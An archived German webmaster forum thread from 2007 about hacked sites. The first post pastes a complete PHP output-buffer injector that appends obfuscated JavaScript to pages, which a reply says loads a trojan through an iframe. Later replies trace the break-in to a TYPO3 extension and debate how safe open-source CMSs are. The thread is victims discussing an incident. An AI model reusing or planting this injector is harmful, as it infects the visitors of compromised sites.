Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Webseite gehackt?? phpfake

Das Board für die kleine Abwechslung. Hast Du was lustiges im Web gefunden oder was offtopic dann hier rein!
medusa
PostRank 1
PostRank 1
Beiträge: 11
Registriert: 07.08.2007, 16:42
Wohnort: München

Beitrag von medusa » 08.09.2007, 11:17

Hallo,

hat hier jemand ein ähnliches Problem gehabt??

Es sind sämtliche index.php sowie index.html Dateien geändert worden
Bei php mit
„<?
ob_start("phpfake");
php“

<?php
function phpfake($buffer)
{
$Exp='<script language="JavaScript">e = \'0x00\' + \'6E\';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";str=tmp=\'\';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>';
return (ereg_replace("</body>", "$Exp</body>", $buffer));
}
?>

In den .html Dateien stand nur das Scrip drin.

Wurde der Server (Puretec) gehackt oder woran liegt das, dass sämtliche index Dateien geändert wurden sind?

Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.


seo-theo
PostRank 7
PostRank 7
Beiträge: 536
Registriert: 18.10.2006, 21:10

Beitrag von seo-theo » 08.09.2007, 11:46

Ja, der Server wurde gehackt.
Da ist per java script ein iframe-Aufruf verschlüsselt und holt einen Trojan auf Deine Domain.
Du wirst jetzt ganz schnell von Google einen Warnhinweis drangepappt kriegen.
Grüße
Seo-Theo

Und wenn du lange in einen Gockel blickst, blickt der Gockel auch in dich hinein.


Bist Du Admin eines großen Forums? Wenn ja, dann klick mal hier...

medusa
PostRank 1
PostRank 1
Beiträge: 11
Registriert: 07.08.2007, 16:42
Wohnort: München

Beitrag von medusa » 08.09.2007, 11:56

Hallo Seo-Theo,

naja, das ganze war eine Stunde bis max. 1,5 Stunden online. Wir haben es zum Glück gleich gemerkt und sämtliche Passwörter und Dateien geändert, so dass es bei google nicht angekommen sein sollte.

beste Grüße medusa

philophax
PostRank 6
PostRank 6
Beiträge: 344
Registriert: 02.03.2005, 17:41
Wohnort: nahe Stuttgart 21

Beitrag von philophax » 08.09.2007, 18:28

Hatten wir auch. Kam über eine Extension von Typo3. Hatte aber nicht nur so gut wie alle (!) html und php-Dateien (mit unterschiedlichen Codes - auch JavaSscripte, in fast ALLEN Domains) verseucht, die einen Trojaner oä auf den Rechner des Users (nicht auf die Domain) bringen können, sondern auch config-Dateien und was weiß ich nicht noch alles angegriffen. Eine nette Geschichte wurde auf dem Server eingebaut, die die Root-Passwords an den Angreifer schickte (ich kenn mich nicht so gut aus, das macht mein Admin).

Das Ende der Geschichte: Server plattgemacht, völlig neu und jetzt sicher wieder aufgesetzt. Alles wird umgezogen, alle Typos neu aufgesetzt (Backups waren auch verseucht).

Wir haben unser Lehrgeld gezahlt (bzw sind noch dabei). Und viele andere auch.

Und es gibt sicher viele zig-Tausende, die noch überhaupt nix davon ahnen.

Eine ganz große Sch...

seo-link
PostRank 9
PostRank 9
Beiträge: 2073
Registriert: 28.09.2006, 06:19

Beitrag von seo-link » 09.09.2007, 07:32

Ja ... mein Server wurde auch gehackt ... 11 Domains waren betroffen. Allerdings nur die index.php und index.html war mit dem Code zugeknallt.

Werde wohl den Hoster wechseln .... auf Supportanfragen diesbezüglich wird nicht reagiert ..... am Ende bin ich wieder daran Schuld :cry:

cren
PostRank 6
PostRank 6
Beiträge: 379
Registriert: 04.06.2005, 16:30

Beitrag von cren » 09.09.2007, 16:51

Hoster wechseln bringt da nur in den seltensten Fällen was, da solche Angriffe meist über unsichere Software laufen, die der Kunde installiert hat (z. B. Extensions für bekannte CMS, deren Exploits auf einschlägigen Webseiten zu finden sind).

shapeshifter
PostRank 9
PostRank 9
Beiträge: 1480
Registriert: 20.10.2004, 16:01

Beitrag von shapeshifter » 09.09.2007, 17:40

Ich würd mittlerweile komplett davon abraten, Open-Source CMS System wie Typo3 oder Joomla zu nutzen ..... die Faulheit sich bei seinem System an der Theke der "KannAllesHatAlles"-Software zu bedienen bekommt man direkt durch "offene Scheunentore" bezahlt.

SEO ohne Programmierkenntnisse wird in Zukunft eh unmöglich ......

medusa
PostRank 1
PostRank 1
Beiträge: 11
Registriert: 07.08.2007, 16:42
Wohnort: München

Beitrag von medusa » 09.09.2007, 17:59

Da lief zwar das Typo3 aber nicht öffentlich (nicht im Domainroot erreichbar)sondern nur zum Testen.

shapeshifter
PostRank 9
PostRank 9
Beiträge: 1480
Registriert: 20.10.2004, 16:01

Beitrag von shapeshifter » 09.09.2007, 18:44

"Öffentlich" ist für den "Interessierten" nur eine Frage der Qualifikation ;)

seo-link
PostRank 9
PostRank 9
Beiträge: 2073
Registriert: 28.09.2006, 06:19

Beitrag von seo-link » 10.09.2007, 05:52

Ja stimmt .... ich hatte mal zu Testzwecken das neue Joomla installiert. Danach konnte ich einige Ordner nicht mehr vom Server löschen. :idea:

Also CMS (free) werd ich wohl nie wieder einsetzen. :wink:

Keyser Soze
PostRank 9
PostRank 9
Beiträge: 1414
Registriert: 07.09.2004, 08:58

Beitrag von Keyser Soze » 10.09.2007, 14:14

Um welche Typo3-Extension ging es konkret?
[url=httpss://www.vermarktercheck.de]VermarkterCheck.de[/url] - Webseiten-Vermarkter im Vergleich

philophax
PostRank 6
PostRank 6
Beiträge: 344
Registriert: 02.03.2005, 17:41
Wohnort: nahe Stuttgart 21

Beitrag von philophax » 15.09.2007, 11:41

Das war die macina_banners.
Hier https://www.typo3.net/forum/list/list_p ... #pid240269
der Thread bei typo3.net

Keyser Soze
PostRank 9
PostRank 9
Beiträge: 1414
Registriert: 07.09.2004, 08:58

Beitrag von Keyser Soze » 16.09.2007, 07:59

Okay. Ich hatte nach der Lektüre dieses Threads entdeckt, dass auch ve_guestbook in einer älteren Version sehr unsicher ist (stand in einem aktuellen Security Bulletin auf typo3.org). Diese Extension habe ich nun abgedichtet.
[url=httpss://www.vermarktercheck.de]VermarkterCheck.de[/url] - Webseiten-Vermarkter im Vergleich

HaraldHil
PostRank 9
PostRank 9
Beiträge: 1437
Registriert: 11.09.2007, 08:52

Beitrag von HaraldHil » 18.09.2007, 10:29

Ich würd mittlerweile komplett davon abraten, Open-Source CMS System wie Typo3 oder Joomla zu nutzen ..... die Faulheit sich bei seinem System an der Theke der "KannAllesHatAlles"-Software zu bedienen bekommt man direkt durch "offene Scheunentore" bezahlt.
@shapeshifter: Na ja, osCommerce, PHPNuke und andere kann man schon sicher betreiben, wenn man das nötige Know how hat. Dieser obige Open Source Verriß ist einfach oberflächlich.

Dem Satz zu "SEO ohne Prog-kenntnisse" stimme ich allerdings uneingeschränkt zu.

marc75
PostRank 9
PostRank 9
Beiträge: 1916
Registriert: 06.10.2004, 09:36

Beitrag von marc75 » 18.09.2007, 11:45

Na ja, osCommerce, PHPNuke und andere kann man schon sicher betreiben

:lol: :lol: :lol:

PHPNuke würde ich überhaupt nicht erwähnen, der Ursprung schlechter OS CMS Systeme (eigentlich ist es nicht mal ein CMS, sondern eine Com.)

Und oscommerce hatte sich früher auch nicht mit Ruhm bekläckert, wie es heute ist weiß ich nicht.

Auf alle Fälle liegt es zu 99% an den verwendeten Software Programmen, das solche Sachen eingeschleust werden. OS Programme sind dazu immer beliebt, da hier der Code offen für alle vorliegt. Sehr beliebt sind PHP Programme, da hier auch Deppen sich alle Progger versuchen, ohne sich an minimale Sicherheitsstandards zu halten.

Antworten
  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag